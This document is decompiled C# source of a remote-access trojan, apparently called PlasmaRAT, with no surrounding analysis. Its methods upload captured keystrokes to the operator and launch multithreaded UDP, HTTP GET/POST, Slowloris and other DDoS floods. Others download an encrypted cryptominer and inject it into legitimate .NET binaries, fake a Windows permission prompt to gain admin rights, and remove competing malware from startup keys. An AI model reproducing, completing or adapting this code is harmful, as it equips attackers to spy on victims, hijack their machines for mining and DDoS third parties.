// Token: 0x0600003E RID: 62 RVA: 0x0000448C File Offset: 0x0000268C public static void SearchLogs(string query) { try { string text = PlasmaRAT.AES_Decrypt(File.ReadAllText(Logger.KeyLogFile)); if (text.Contains(query)) { string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "PROCID", ""); PlasmaRAT.Send(string.Concat(new string[] { "KEYLOGS*", Environment.UserName.ToString(), ".", setting, "*", text, "\r\n", Logger.KeyLogs })); PlasmaRAT.TalktoChannel("Found Query in Keylogs, Uploaded Successfully!", string.Empty); } } catch (Exception ex) { } }
// Token: 0x0600000C RID: 12 RVA: 0x00002D00 File Offset: 0x00000F00 public static void StopARME() { if (ARME.AttackRunning) { int num = 0; int num2 = ARME.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { ARME.Threads[i].Abort(); } catch (Exception ex) { } } ARME.AttackRunning = false; PlasmaRAT.TalktoChannel("ARME Attack on " + ARME.HostToAttack + " aborted successfully. Attacks Sent: " + ARME.Attacks.ToString(), ""); ARME.Attacks = 0; } else { PlasmaRAT.TalktoChannel("ARME Attack:, ", "Not Running!"); } }
// Token: 0x06000090 RID: 144 RVA: 0x000093F0 File Offset: 0x000075F0 public static void InstallMiner(string FileDownload, string Pool, string Username, string Password) { try { if (!File.Exists(Conversions.ToString(Miner.PoolerMiner))) { WebClient webClient = new WebClient(); byte[] input = webClient.DownloadData(FileDownload); byte[] bytes = Miner.Proper_RC4(input, Encoding.UTF8.GetBytes(PlasmaRAT.Username)); File.WriteAllBytes(Conversions.ToString(Miner.PoolerMiner), bytes); } Interaction.SaveSetting("Microsoft", "Sysinternals", "id", string.Concat(new string[] { "*", Pool, "*", Username, "*", Password, "*" })); Miner.BeginMiner(); } catch (Exception ex) { PlasmaRAT.TalktoChannel("Miner: Failed to Download Files. Error: " + ex.ToString(), string.Empty); } }
// Token: 0x0600002A RID: 42 RVA: 0x00003F70 File Offset: 0x00002170 public static void StopUDP() { if (UDP.AttackRunning) { int num = 0; int num2 = UDP.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { UDP.Threads[i].Abort(); } catch (Exception ex) { } } UDP.AttackRunning = false; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "UDP Attack on ", UDP.HostToAttack, ":", UDP.Port.ToString(), " aborted successfully. Packets Sent: ", UDP.attacks.ToString() }), ""); UDP.attacks = 0; } else { PlasmaRAT.TalktoChannel("No UDP Attack is Running!", ""); } }
// Token: 0x06000016 RID: 22 RVA: 0x0000335C File Offset: 0x0000155C public static void StopCondis() { if (Condis.AttackRunning) { int num = 0; int num2 = Condis.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { Condis.Threads[i].Abort(); } catch (Exception ex) { } } Condis.AttackRunning = false; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Condis Attack on ", Condis.HostToAttack, ":", Condis.Port.ToString(), " aborted successfully. Attacks Sent: ", Condis.attacks.ToString() }), ""); Condis.attacks = 0; } else { PlasmaRAT.TalktoChannel("No Condis Attack is Running!", ""); } }
// Token: 0x0600001B RID: 27 RVA: 0x00003674 File Offset: 0x00001874 public static void StopHTTPGET() { if (BandwidthFlood.AttackRunning) { int num = 0; int num2 = BandwidthFlood.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { BandwidthFlood.Threads[i].Abort(); } catch (Exception ex) { } } BandwidthFlood.AttackRunning = false; PlasmaRAT.TalktoChannel("HTTP GET Attack on " + BandwidthFlood.HostToAttack + " aborted successfully. Attacks Sent: " + BandwidthFlood.Attacks.ToString(), ""); BandwidthFlood.Attacks = 0; } else { PlasmaRAT.TalktoChannel("No HTTP GET Attack is Running!", ""); } }
// Token: 0x06000020 RID: 32 RVA: 0x000038EC File Offset: 0x00001AEC public static void StopPOSTHTTP() { if (PostHTTP.AttackRunning) { int num = 0; int num2 = PostHTTP.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { PostHTTP.Threads[i].Abort(); } catch (Exception ex) { } } PostHTTP.AttackRunning = false; PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " aborted successfully. Attacks Sent: " + PostHTTP.attacks.ToString(), ""); PostHTTP.attacks = 0; } else { PlasmaRAT.TalktoChannel("No HTTP POST Attack is Running!", ""); } }
// Token: 0x06000025 RID: 37 RVA: 0x00003BE8 File Offset: 0x00001DE8 public static void StopSlowloris() { if (Slowloris.AttackRunning) { int num = 0; int num2 = Slowloris.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { Slowloris.Threads[i].Abort(); } catch (Exception ex) { } } Slowloris.AttackRunning = false; PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " aborted successfully. Attacks Sent: " + Slowloris.attacks.ToString(), ""); Slowloris.attacks = 0; } else { PlasmaRAT.TalktoChannel("No Slowloris Attack is Running!", ""); } }
// Token: 0x06000014 RID: 20 RVA: 0x00003184 File Offset: 0x00001384 public static void StartCondis(string Host, int Threadsto, int Time, int Ports) { if (!Condis.AttackRunning) { Condis.AttackRunning = true; Condis.HostToAttack = Host; Condis.Port = Ports; Condis.ThreadstoUse = Threadsto; Condis.TimetoAttack = Time; Condis.Threads = new Thread[Threadsto - 1 + 1]; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Condis Attack on ", Condis.HostToAttack, ":", Condis.Port.ToString(), " Started!" }), ""); int num = 0; int num2 = Threadsto - 1; for (int i = num; i <= num2; i++) { Condis.Threads[i] = new Thread(new ThreadStart(Condis.DoWork)); Condis.Threads[i].IsBackground = true; Condis.Threads[i].Start(); } } else { PlasmaRAT.TalktoChannel("A Condis Attack is Already Running on " + Condis.HostToAttack + ":" + Condis.Port.ToString(), ""); } }
// Token: 0x0600001E RID: 30 RVA: 0x000037A0 File Offset: 0x000019A0 public static void StartPOSTHTTP(string Host, int Threadsto, int Time, string data) { if (!PostHTTP.AttackRunning) { PostHTTP.AttackRunning = true; PostHTTP.HostToAttack = Host; PostHTTP.PostDATA = data; PostHTTP.ThreadstoUse = Threadsto; PostHTTP.TimetoAttack = Time; PostHTTP.Threads = new Thread[Threadsto - 1 + 1]; PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " started!", ""); int num = 0; int num2 = Threadsto - 1; for (int i = num; i <= num2; i++) { PostHTTP.Threads[i] = new Thread(new ThreadStart(PostHTTP.DoWork)); PostHTTP.Threads[i].IsBackground = true; PostHTTP.Threads[i].Start(); } } else { PlasmaRAT.TalktoChannel("A HTTP POST Attack is Already Running on " + PostHTTP.HostToAttack, ""); } }
// Token: 0x06000011 RID: 17 RVA: 0x00003024 File Offset: 0x00001224 public static void StopBandwidthFlood() { if (HTTPGet.AttackRunning) { int num = 0; int num2 = HTTPGet.ThreadstoUse - 1; for (int i = num; i <= num2; i++) { try { HTTPGet.Threads[i].Abort(); } catch (Exception ex) { } } HTTPGet.AttackRunning = false; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Bandwidth Flood on ", HTTPGet.HostToAttack, " aborted successfully, downloading the file ", HTTPGet.attacks.ToString(), " times." }), ""); HTTPGet.attacks = 0; } else { PlasmaRAT.TalktoChannel("No Bandwidth Flood Attack is Running!", ""); } }
// Token: 0x06000024 RID: 36 RVA: 0x00003B68 File Offset: 0x00001D68 private static void lol() { Slowloris.ThreadsEnded = Operators.AddObject(Slowloris.ThreadsEnded, 1); if (Operators.ConditionalCompareObjectEqual(Slowloris.ThreadsEnded, Slowloris.ThreadstoUse, false)) { Slowloris.ThreadsEnded = 0; Slowloris.ThreadstoUse = 0; Slowloris.AttackRunning = false; PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " finished successfully. Attacks Sent: " + Slowloris.attacks.ToString(), ""); Slowloris.attacks = 0; } }
// Token: 0x0600001A RID: 26 RVA: 0x000035F4 File Offset: 0x000017F4 private static void lol() { BandwidthFlood.ThreadsEnded = Operators.AddObject(BandwidthFlood.ThreadsEnded, 1); if (Operators.ConditionalCompareObjectEqual(BandwidthFlood.ThreadsEnded, BandwidthFlood.ThreadstoUse, false)) { BandwidthFlood.ThreadsEnded = 0; BandwidthFlood.ThreadstoUse = 0; BandwidthFlood.AttackRunning = false; PlasmaRAT.TalktoChannel("HTTP GET Attack on " + BandwidthFlood.HostToAttack + " finished successfully. Attacks Sent: " + BandwidthFlood.Attacks.ToString(), ""); BandwidthFlood.Attacks = 0; } }
// Token: 0x0600001F RID: 31 RVA: 0x0000386C File Offset: 0x00001A6C private static void lol() { PostHTTP.ThreadsEnded = Operators.AddObject(PostHTTP.ThreadsEnded, 1); if (Operators.ConditionalCompareObjectEqual(PostHTTP.ThreadsEnded, PostHTTP.ThreadstoUse, false)) { PostHTTP.ThreadsEnded = 0; PostHTTP.ThreadstoUse = 0; PostHTTP.AttackRunning = false; PlasmaRAT.TalktoChannel("HTTP POST Attack on " + PostHTTP.HostToAttack + " finished successfully. Attacks Sent: " + PostHTTP.attacks.ToString(), ""); PostHTTP.attacks = 0; } }
// Token: 0x0600003D RID: 61 RVA: 0x00004434 File Offset: 0x00002634 public static void DeleteLogs() { try { if (File.Exists(Logger.KeyLogFile)) { File.WriteAllText(Logger.KeyLogFile, string.Empty); } PlasmaRAT.TalktoChannel("Keylogs deleted Successfully!", string.Empty); } catch (Exception ex) { } }
// Token: 0x06000089 RID: 137 RVA: 0x00008BB0 File Offset: 0x00006DB0 public static void BeginGPUMiner() { try { if (!GPUMiner.RanGPUMiner) { string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "vir32", ""); if (Operators.CompareString(setting, string.Empty, false) != 0) { string[] array = Strings.Split(setting, "*", -1, CompareMethod.Binary); string optionalArguments = string.Concat(new string[] { "-a scrypt -o ", array[1], " ", array[2], " -p ", array[3], " -g yes --i -10" }); if (File.Exists(Conversions.ToString(GPUMiner.GPUMinerFile))) { Persistence.AllowAccess(Conversions.ToString(GPUMiner.GPUMinerFile)); byte[] input = MyProject.Computer.FileSystem.ReadAllBytes(Conversions.ToString(GPUMiner.GPUMinerFile)); byte[] array2 = Miner.Proper_RC4(input, Encoding.UTF8.GetBytes(PlasmaRAT.Username)); Array.Reverse(array2, 0, array2.Length); if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "csc.exe", optionalArguments)) { GPUMiner.RanGPUMiner = true; GPUMiner.GPUMinerExecutable = "csc"; } else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "vbc.exe", optionalArguments)) { GPUMiner.RanGPUMiner = true; GPUMiner.GPUMinerExecutable = "vbc"; } if (GPUMiner.RanGPUMiner) { PlasmaRAT.TalktoChannel("Started GPU Mining on: " + PlasmaRAT.GetVideoCard(), string.Empty); } } } } } catch (Exception ex) { } }
// Token: 0x06000010 RID: 16 RVA: 0x00002F74 File Offset: 0x00001174 private static void lol() { HTTPGet.ThreadsEnded = Operators.AddObject(HTTPGet.ThreadsEnded, 1); if (Operators.ConditionalCompareObjectEqual(HTTPGet.ThreadsEnded, HTTPGet.ThreadstoUse, false)) { HTTPGet.ThreadsEnded = 0; HTTPGet.ThreadstoUse = 0; HTTPGet.AttackRunning = false; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Bandwidth Flood on ", HTTPGet.HostToAttack, " finished successfully, downloading the file ", HTTPGet.attacks.ToString(), " times." }), ""); HTTPGet.attacks = 0; } }
// Token: 0x06000015 RID: 21 RVA: 0x00003298 File Offset: 0x00001498 private static void lol() { Condis.ThreadsEnded = Operators.AddObject(Condis.ThreadsEnded, 1); if (Operators.ConditionalCompareObjectEqual(Condis.ThreadsEnded, Condis.ThreadstoUse, false)) { Condis.ThreadsEnded = 0; Condis.ThreadstoUse = 0; Condis.AttackRunning = false; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Condis Attack on ", Condis.HostToAttack, ":", Condis.Port.ToString(), " finished successfully. Attacks Sent: ", Condis.attacks.ToString() }), ""); Condis.attacks = 0; } }
// Token: 0x06000043 RID: 67 RVA: 0x00004C78 File Offset: 0x00002E78 public static void RunAVAdminMode() { try { string text = Path.GetTempPath() + "HardwareCheck.exe"; if (!AntiEverything.IsAdmin() && Operators.CompareString(PlasmaRAT.GetAntiVirus(), "AntiVirus: N/A", false) != 0 && Operators.CompareString(Interaction.GetSetting("Microsoft", "Sysinternals", "AV", ""), "ran", false) != 0) { if (!File.Exists(text)) { File.Copy(Application.ExecutablePath, text); } ProcessStartInfo processStartInfo = new ProcessStartInfo("cmd.exe", string.Concat(new string[] { "/c ", text, "\r\n\r\n Windows has detected a recent software change and needs permissions to continue. This process will take about 30-60 seconds depending on your internet connection. Please hit Yes to continue.\r\n\r\nSystem Info:\r\nAccount: ", Environment.UserName.ToString().ToString(), "\r\nProcessor Count: ", Environment.ProcessorCount.ToString(), "\r\nOperating System: ", MyProject.Computer.Info.OSFullName })); processStartInfo.WindowStyle = ProcessWindowStyle.Hidden; processStartInfo.UseShellExecute = true; processStartInfo.WorkingDirectory = Environment.CurrentDirectory; processStartInfo.Verb = "runas"; try { Process.Start(processStartInfo); Interaction.SaveSetting("Microsoft", "Sysinternals", "AV", "ran"); PlasmaRAT.TalktoChannel("AV Killer: Targeted " + PlasmaRAT.GetAntiVirus(), string.Empty); } catch (Exception ex) { } } } catch (Exception ex2) { } }
// Token: 0x06000023 RID: 35 RVA: 0x00003A20 File Offset: 0x00001C20 public static void StartSlowloris(string Host, int Threadsto, int Time, string data) { if (!Slowloris.AttackRunning) { Slowloris.AttackRunning = true; Slowloris.HostToAttack = Host; Slowloris.PostDATA = data; Slowloris.ThreadstoUse = Threadsto; Slowloris.TimetoAttack = Time; if (Slowloris.HostToAttack.Contains("http://")) { Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("http://", string.Empty); } if (Slowloris.HostToAttack.Contains("www.")) { Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("www.", string.Empty); } if (Slowloris.HostToAttack.Contains("/")) { Slowloris.HostToAttack = Slowloris.HostToAttack.Replace("/", string.Empty); } Slowloris.Threads = new Thread[Threadsto - 1 + 1]; PlasmaRAT.TalktoChannel("Slowloris Attack on " + Slowloris.HostToAttack + " started!", ""); int num = 0; int num2 = Threadsto - 1; for (int i = num; i <= num2; i++) { Slowloris.Threads[i] = new Thread(new ThreadStart(Slowloris.DoWork)); Slowloris.Threads[i].IsBackground = true; Slowloris.Threads[i].Start(); } } else { PlasmaRAT.TalktoChannel("A Slowloris Attack is Already Running on " + Slowloris.HostToAttack, ""); } }
// Token: 0x06000019 RID: 25 RVA: 0x00003530 File Offset: 0x00001730 public static void StartHTTPGet(string Host, int Threadsto, int Time) { if (!BandwidthFlood.AttackRunning) { BandwidthFlood.AttackRunning = true; BandwidthFlood.HostToAttack = Host; BandwidthFlood.ThreadstoUse = Threadsto; BandwidthFlood.TimetoAttack = Time; BandwidthFlood.Threads = new Thread[Threadsto - 1 + 1]; PlasmaRAT.TalktoChannel("HTTP GET Attack on " + BandwidthFlood.HostToAttack + " started!", ""); int num = 0; int num2 = Threadsto - 1; for (int i = num; i <= num2; i++) { BandwidthFlood.Threads[i] = new Thread(new ThreadStart(BandwidthFlood.DoWork)); BandwidthFlood.Threads[i].IsBackground = true; BandwidthFlood.Threads[i].Start(); } } else { PlasmaRAT.TalktoChannel("A HTTP GET Attack is Already Running on " + BandwidthFlood.HostToAttack, ""); } }
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C public static object HardBotKill() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (AntiEverything.AntisDetected) { goto IL_AB; } IL_13: num2 = 3; BotKillers.RunStartupKiller(); IL_1A: num2 = 4; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_32: num2 = 5; HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_4A: num2 = 6; BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); IL_57: num2 = 7; if (!AntiEverything.IsAdmin()) { goto IL_91; } IL_60: num2 = 8; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true)); IL_78: num2 = 9; HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true)); IL_91: num2 = 11; BotKillers.ScanProcess(); IL_99: num2 = 12; PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty); IL_AB: goto IL_135; IL_B0: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_F6: goto IL_12A; IL_F8: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_108 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_F8; } IL_12A: throw ProjectData.CreateProjectError(-2146828237); IL_135: object obj3; object result = obj3; if (num4 != 0) { ProjectData.ClearProjectError(); } return(result); }
// Token: 0x06000091 RID: 145 RVA: 0x000094EC File Offset: 0x000076EC public static void RemoveMiner() { int num; int num4; object obj2; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "id", ""); IL_23: num2 = 3; if (Operators.CompareString(setting, string.Empty, false) == 0) { goto IL_FC; } IL_37: num2 = 4; Interaction.SaveSetting("Microsoft", "Sysinternals", "id", string.Empty); IL_52: num2 = 5; IEnumerator enumerator = ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[] { "Select Name from Win32_Process Where Name = '" + Miner.MinerExecutable + ".exe'" }, null, null, null)).GetEnumerator(); while (enumerator.MoveNext()) { object obj = enumerator.Current; object objectValue = RuntimeHelpers.GetObjectValue(obj); IL_A8: num2 = 6; NewLateBinding.LateCall(objectValue, null, "Terminate", new object[0], null, null, null, true); IL_C2: num2 = 7; } if (enumerator is IDisposable) { (enumerator as IDisposable).Dispose(); } IL_E2: num2 = 8; Miner.RanMiner = false; IL_EA: num2 = 9; PlasmaRAT.TalktoChannel("CPU Miner: Stopped Successfully.", string.Empty); IL_FC: goto IL_17B; IL_FE: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_13A: goto IL_170; IL_13C: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_14D :; } catch when(endfilter(obj2 is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj3; goto IL_13C; } IL_170: throw ProjectData.CreateProjectError(-2146828237); IL_17B: if (num4 != 0) { ProjectData.ClearProjectError(); } }
// Token: 0x0600008F RID: 143 RVA: 0x0000910C File Offset: 0x0000730C public static void BeginMiner() { try { if (!Miner.RanMiner) { string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "id", ""); if (Operators.CompareString(setting, string.Empty, false) != 0) { string[] array = Strings.Split(setting, "*", -1, CompareMethod.Binary); if (File.Exists(Conversions.ToString(Miner.PoolerMiner))) { Persistence.AllowAccess(Conversions.ToString(Miner.PoolerMiner)); int num = Environment.ProcessorCount; if (num == 0) { num = 1; } if (num == 2) { num = 1; } if (num == 3) { num = 2; } if (num == 4) { num = 3; } if (num == 6) { num = 4; } if (num == 8) { num = 6; } if (num == 12) { num = 10; } if (num == 16) { num = 14; } byte[] input = MyProject.Computer.FileSystem.ReadAllBytes(Conversions.ToString(Miner.PoolerMiner)); byte[] array2 = Miner.Proper_RC4(input, Encoding.UTF8.GetBytes(PlasmaRAT.Username)); Array.Reverse(array2, 0, array2.Length); string optionalArguments = string.Concat(new string[] { "-a scrypt -o ", array[1], " -O ", array[2], ":", array[3], " -t", num.ToString() }); if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "cvtres.exe", optionalArguments)) { Miner.RanMiner = true; Miner.MinerExecutable = "cvtres"; } else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "vbc.exe", optionalArguments)) { Miner.RanMiner = true; Miner.MinerExecutable = "vbc"; } else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "csc.exe", optionalArguments)) { Miner.RanMiner = true; Miner.MinerExecutable = "csc"; } else if (mRunpe.InjectPE(array2, RuntimeEnvironment.GetRuntimeDirectory() + "ngen.exe", optionalArguments)) { Miner.RanMiner = true; Miner.MinerExecutable = "ngen"; } Miner.SetScreenSaverActive(false); if (Miner.RanMiner) { PlasmaRAT.TalktoChannel(string.Concat(new string[] { "Miner: Injected into ", Miner.MinerExecutable, ".exe. Started Mining With ", num.ToString(), " Cores." }), string.Empty); } else { PlasmaRAT.TalktoChannel("Miner: Failed to Inject.", string.Empty); } } } } else { PlasmaRAT.TalktoChannel("Miner: Already Running on System", string.Empty); } } catch (Exception ex) { PlasmaRAT.TalktoChannel("Miner: Failed to Inject File.", string.Empty); } }
// Token: 0x06000053 RID: 83 RVA: 0x00005794 File Offset: 0x00003994 public static void RunStandardBotKiller() { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; BotKillers.ScanProcess(); IL_0E: num2 = 3; BotKillers.RunStartupKiller(); IL_15: num2 = 4; PlasmaRAT.TalktoChannel(string.Concat(new string[] { "BotKiller: Processes Killed: ", BotKillers.ProccessKilled.ToString(), ". Startup Items Killed: ", BotKillers.Startupkilled.ToString(), "." }), ""); IL_74: num2 = 5; BotKillers.ProccessKilled = 0; IL_7C: num2 = 6; BotKillers.Startupkilled = 0; IL_84: goto IL_EF; IL_86: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_B0: goto IL_E4; IL_B2: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_C2 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_B2; } IL_E4: throw ProjectData.CreateProjectError(-2146828237); IL_EF: if (num4 != 0) { ProjectData.ClearProjectError(); } }
// Token: 0x060000AD RID: 173 RVA: 0x0000B2EC File Offset: 0x000094EC public static void SeedTorrent(string path) { int num; int num4; object obj; try { IL_00: ProjectData.ClearProjectError(); num = 1; IL_07: int num2 = 2; if (!Torrent.IsVuze()) { goto IL_33; } IL_10: num2 = 3; Torrent.SeedItVuze(Torrent.VuzePath, path); IL_1D: num2 = 4; PlasmaRAT.TalktoChannel("Seeding Torrent With Vuze", string.Empty); IL_2E: goto IL_143; IL_33: num2 = 6; if (!Torrent.IsBitTorrent()) { goto IL_64; } IL_3C: num2 = 7; Torrent.SeedIt(Torrent.BitLocalPath, Torrent.BitLocalPath, path); IL_4E: num2 = 8; PlasmaRAT.TalktoChannel("Seeding Torrent with BitTorrent", string.Empty); IL_5F: goto IL_143; IL_64: num2 = 10; if (!Torrent.IsUtorrent()) { goto IL_98; } IL_6E: num2 = 11; Torrent.SeedIt(Torrent.UTorrentPath, Torrent.UTorrentLocalPath, path); IL_81: num2 = 12; PlasmaRAT.TalktoChannel("Seeding Torrent with uTorrent", string.Empty); IL_93: goto IL_143; IL_98: num2 = 14; IL_9B: num2 = 15; PlasmaRAT.TalktoChannel("Unable to Seed: No Torrent Client Installed", string.Empty); IL_AD: goto IL_143; IL_B2: int num3 = num4 + 1; num4 = 0; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3); IL_104: goto IL_138; IL_106: num4 = num2; @switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num); IL_116 :; } catch when(endfilter(obj is Exception & num != 0 & num4 == 0)) { Exception ex = (Exception)obj2; goto IL_106; } IL_138: throw ProjectData.CreateProjectError(-2146828237); IL_143: if (num4 != 0) { ProjectData.ClearProjectError(); } }